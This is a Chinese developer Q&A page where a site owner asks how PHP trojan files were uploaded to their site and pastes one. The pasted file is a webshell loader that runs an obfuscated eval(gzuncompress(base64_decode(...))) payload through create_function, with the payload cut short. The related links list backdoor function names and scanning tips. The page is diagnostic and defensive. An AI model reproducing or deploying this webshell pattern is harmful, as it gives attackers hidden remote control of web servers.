网站被挂马，上传了好多个php木马文件，是怎么上传的？

代码如下

<?php
$password='wyxd';
$shellname='��վ��ȫ���';
$myurl='http://www.baidu.com';
error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);
header("content-Type: text/html; charset=gb2312");
$filename='$password=\''.$password.'\';
$shellname=\''.$shellname.'\';$myurl=\''.$myurl.'\';
e'.'v'.'a'.'l(g'.'z'.'un'.'co'.'mp'.'re'.'ss(bas'.'e64_'.'deco'.'de(\'
eJzs/fl3HNd5J4z/zJzj/6HchtWAiaX2hRBo1UqCC0ACIClS1I
u30WgALTTQUHeDiyj+MY5nJn4dz4kla7EtybIlOZYl21IsWXZ8
PDMZTyaz+Ot5J8skmWzn+/ncW1Vd1QsIynYyOW8gEeiuuvt99v
s8z21vrHd7tU5vcmr+E7+12dhq7jcmq3t3a5ubnUa3W52eWF+N
V67........

V0\')));';$Base=Create_Function('',$filename);$Base();?>

写回答
好问题 0 提建议
关注问题
分享
邀请回答
编辑收藏删除结题
收藏举报

1条回答默认最新

关注

码龄粉丝数原力等级 --

被采纳

被点赞

采纳率
threenewbee 2020-05-28 19:48
关注
很多可能性，比如说通过上传+代码注入的方式，拿到webshell
也可能是本身服务器感染了木马

本回答被题主选为最佳回答 , 对您是否有帮助呢?

解决无用
评论打赏
分享
举报

评论

按下Enter换行，Ctrl+Enter发表内容

报告相同问题？

关注问题

网站被挂木马，手机访问会跳转到垃圾站 javascript php
2019-12-24 23:10

回答 1 已采纳 static下面，每个js和css都检查一遍
wordpress被挂马，应该怎么办？ css html5 php 有问必答
2021-11-12 23:30

回答 1 已采纳不应该呀，是不是你源码用的原本就有问题呀，如果你模板不是正版很可能被挂马，我建议你进行重装网站，然后将数据库导入，当然最好换DNS解析，在腾讯云或者阿里云买一台服务器，然后解析域名，将网站进行迁移
打开网页会弹出下载提示f.txt，我的网站是不是被挂马了，帮我看看
2018-06-01 15:41

回答 2 已采纳是的，肯定是挂马了，很可能是google ads广告之类的，嵌入你的网站，然后这个攻击者可以因此赚钱。你可以打开你的网站的页面，f12，看下有没有多余的广告。
php网站被挂木马后的修复方法总结
2020-12-19 17:59

本文实例总结了php网站被挂木马后的修复方法。分享给大家供大家参考。具体方法如下：在linux中我们可以使用命令来搜查木马文件,到代码安装目录执行下面命令复制代码代码如下:find ./ -iname “*.php” | xargs ...
PHP 5 - 保护站点的管理区域 php
2010-07-25 22:02

回答 3 已采纳 Your function appears to be redirecting to /admin only if the user is not an administrator. If t
关于网站挂马
2009-07-22 18:45

回答 2 已采纳 [url]http://safe.it168.com/ss/2008-03-05/200803052109907.shtml[/url] 有详细说明
php被挂马,PHP网站被挂马防御战
2021-04-15 19:10

宇宙探奇的博客我在本地测试了这些木马程序，可以读取所有硬盘的文件，可以随意修改文件，下载任意硬盘位置的文件，上传文件到主最近把几个PHP网站的程序备份到本地，准备与本地的发布版的svn做内容整合。发现有一些non-versioned...
PHP检测本地图片是否有木马
2019-04-20 10:39

也可以用linux服务器上的木马扫描软件，比如 Clamav 支持命令行执行的，上传之后就扫一下，最可靠， $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = ...
tp 如果被上传.php木马文件怎么处理
2020-06-01 23:03

qq_42289686的博客有很多网站被黑，导致网站关键词网站标题被修改，更可恶的是你如果发现的晚，关键词都被收录进去了，搞得很麻烦。这是被上传的php文件之一， <?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2...
php网站挂马,转：php 网站挂马检查
2021-03-26 15:33

田渊栋的博客 php后门木马常用的函数大致上可分为四种类型：1.执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2.代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
3个php后门WebShell木马扫描神器
2018-10-09 17:01

3个php后门WebShell木马扫描神器，通过这个可以快速的扫描别人给予的代码里面是否包含后门代码，扫描自己网站服务器里面有没有后门，虚拟主机也可以用，密码打开文件修改，放入根目录，输入网址运行即可。
从nginx层阻断可执行的php，防止php网站被挂马
2023-01-10 12:40

aixh1985的博客从nginx层阻断可执行的php，防止php网站被挂马
php 网站挂马文件
2013-04-15 23:43

php 站的木马文件，有空可以研究下。还行
php实现Linux服务器木马排查及加固功能
2020-10-24 23:52

这个脚本可以帮助我们追踪可能被篡改的文件，以检测潜在的恶意活动。`scandir.php`可以根据设置的参数扫描指定目录，排除特定目录，并检查文件中是否存在危险函数，如`eval`、`cmd`、`passthru`、`gzuncompress`等，...
网站php挂马从哪里挂的,转：php 网站挂马检查
2021-03-25 10:25

周昶帆的博客 php后门木马常用的函数大致上可分为四种类型：1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
网站php挂马从哪里挂的,寻找PHP（网站）挂马，后门
2021-03-25 10:25

weixin_39880328的博客一php后门木马常用的函数大致上可分为四种类型：1.执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2.代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
php网站挂马,网页挂马详细教程
2021-03-26 15:33

青辣椒红辣椒的博客其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单...
php8木马误报,我网站被挂木马了悲剧“超级带(批量挂马)PHP木马”
2021-03-26 15:09

再来一碗饭的博客 gpc")), 18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")), 19 => array(" OST最大字节数 post_max_size",getphpcfg("post_max_size")), 20 => array("允许最大上传文件 upload_max_...
Thinkphp5网站被挂马解决方案
2024-08-28 09:17

网名apper的博客记录一次tp5被挂马的解决办法
防止和修复php网站被挂木马（宝塔）
2022-01-13 15:32

小资神的博客防止和修复php网站被挂木马
没有解决我的问题, 去提问

问题事件

关注

码龄粉丝数原力等级 --

被采纳

被点赞

采纳率
已采纳回答 2月3日

网站被挂马，上传了好多个php木马文件，是怎么上传的？

1条回答 默认 最新

问题事件

1条回答默认最新